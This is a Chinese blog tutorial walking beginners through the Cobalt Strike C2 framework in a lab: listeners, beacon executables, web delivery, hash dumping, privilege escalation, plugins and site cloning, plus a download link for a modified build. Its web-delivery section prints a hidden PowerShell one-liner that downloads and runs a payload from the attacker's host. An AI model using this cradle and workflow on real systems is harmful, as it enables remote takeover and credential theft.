Cobal_Strike使用

介绍

Cobalt Strike(简称CS)是一款备受推崇的团队作战渗透测试工具,其架构包含客户端与服务端两部分,支持一个服务端对应多个客户端,同时一个客户端也能连接多个服务端,展现出高度的灵活性。

该工具主要用于执行后期持久渗透、实现横向移动、隐藏网络流量以及窃取数据等任务。一旦在目标机器上成功执行CS的payload,便会创建一个具备远控木马功能的Beacon,回连至C2服务器,为渗透测试提供强大的支持。

C/S框架工作原理

微信图片_20240823194018

本文主要介绍了cs的【工具基本使用】【web投递】【上线后的一些操作】【日志】【插件】【网站克隆】【视图】,很适合刚入坑不久的萌新来使用

image-20240823192946501

基本使用

版本:4.7 中文美化版本,自带插件

下载链接:https://pan.baidu.com/s/1oHl4hCTuIt33OT2EwO-8cQ
提取码:1212

windows/linux通用,linux用来当服务器,这里我使用kali,将工具包中的Cobal_Strike传到kali中即可,找到这个文件,开启cs服务器

image-20240823103158102

启动时候设置本地IP地址和密码,之后就可以看到端口信息

image-20240823095837441

默认用户名为neo,填写相关的信息

image-20240823190101683

添加监听器

image-20240823190254002

添加监听器,因为我已经有了一个,就点了编辑监听器,这是它的每个配置选项

image-20240823104113400

这里添加成功,列表会多出一选项

image-20240823100443699

生成payload,也就是我们的木马可执行程序

image-20240823103328475

选择监听器,就是旁边三个点,然后单机payload选择即可

image-20240823100809406

选择输出格式类型为windows.exe

image-20240823100751580

放进靶机并执行,已上线,确保攻击机和靶机在同一网段下

传文件可以使用python3 -m http.server 开启一个微型的http服务,也可以使用vmware 自带的vmtools

image-20240823101306161

上线成功后,右键会话交互

image-20240823101711727

使用help查看所有的命令

image-20240823101904827

常用的靶机命令都需要使用shell 目标系统命令

image-20240823190722272

当你执行命令的时候这里有一个会话时间,必须要达到休眠时间才会执行命令,一般都是防止因为流量检测,并不是你卡了

image-20240823103610482

这时候就可以使用sleep 3设置较短时间即可,这样命令就会在3s之后再执行

image-20240823113041818

也可以使用sleep 0设置为实时执行命令,这样命令就会执行的很快但在实战过程中不建议这样使用

image-20240823113159869

web投递

找到攻击菜单栏

image-20240823110313870

选择旁边三个点,按照顺序来

image-20240823110526967

即可添加成功

image-20240823105415489

复制下来就好

powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://192.168.3.232:9999/a'))"

这里使用受害者的主机访问这个URL,这里我使用虚拟机进行测试,其实访问后就是一段powershell代码。访问http://192.168.3.232:9999/a

image-20240823110928355

执行命令

image-20240823111532350

可以看到payload为powershell,成功上线

image-20240823111451573

上线后的一些操作

这里使用的靶机为win7,更高版本的windows在这使用默认的配置,可能不生效,因为补丁已经更新,不存在一些常见的漏洞

抓取hash获取系统密码

image-20240823124617402

利用系统漏洞,权限提升,成功提升到系统权限

image-20240823124734991

日志

找到视图下面的web日志

image-20240823113706957

可以看到刚刚我们请求的url地址 ip/a

image-20240823113715832

插件

脚本管理器

image-20240823191501994

找到cs安装目录下的plugin就是第三方脚本插件

image-20240823114150752

每个文件夹代表着一个插件

image-20240823191653540

脚本一般都是cna后缀

image-20240823114000524

这个时候在已经上线的靶机上,右键就会有一个插件,这些插件有编程基础也可以自己写

image-20240823114038950

网站克隆

image-20240823114950997

image-20240823115141081

image-20240823114932737

image-20240823114922862

视图

image-20240823120217861

以上就是最常用的使用方式,当然还有socks代理,之后文章会提到的

image-20240823193559733


往期推荐

111

暂无评论

发送评论 编辑评论


				
|´・ω・)ノ
ヾ(≧∇≦*)ゝ
(☆ω☆)
(╯‵□′)╯︵┴─┴
 ̄﹃ ̄
(/ω\)
∠( ᐛ 」∠)_
(๑•̀ㅁ•́ฅ)
→_→
୧(๑•̀⌄•́๑)૭
٩(ˊᗜˋ*)و
(ノ°ο°)ノ
(´இ皿இ`)
⌇●﹏●⌇
(ฅ´ω`ฅ)
(╯°A°)╯︵○○○
φ( ̄∇ ̄o)
ヾ(´・ ・`。)ノ"
( ง ᵒ̌皿ᵒ̌)ง⁼³₌₃
(ó﹏ò。)
Σ(っ °Д °;)っ
( ,,´・ω・)ノ"(´っω・`。)
╮(╯▽╰)╭
o(*////▽////*)q
>﹏<
( ๑´•ω•) "(ㆆᴗㆆ)
😂
😀
😅
😊
🙂
🙃
😌
😍
😘
😜
😝
😏
😒
🙄
😳
😡
😔
😫
😱
😭
💩
👻
🙌
🖕
👍
👫
👬
👭
🌚
🌝
🙈
💊
😶
🙏
🍦
🍉
😣
Source: github.com/k4yt3x/flowerhd
颜文字
Emoji
小恐龙
花!
上一篇
下一篇